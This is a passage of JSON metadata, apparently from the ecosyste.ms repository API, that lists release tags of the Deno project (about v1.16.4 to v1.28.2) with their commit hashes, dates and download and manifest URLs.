ories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_a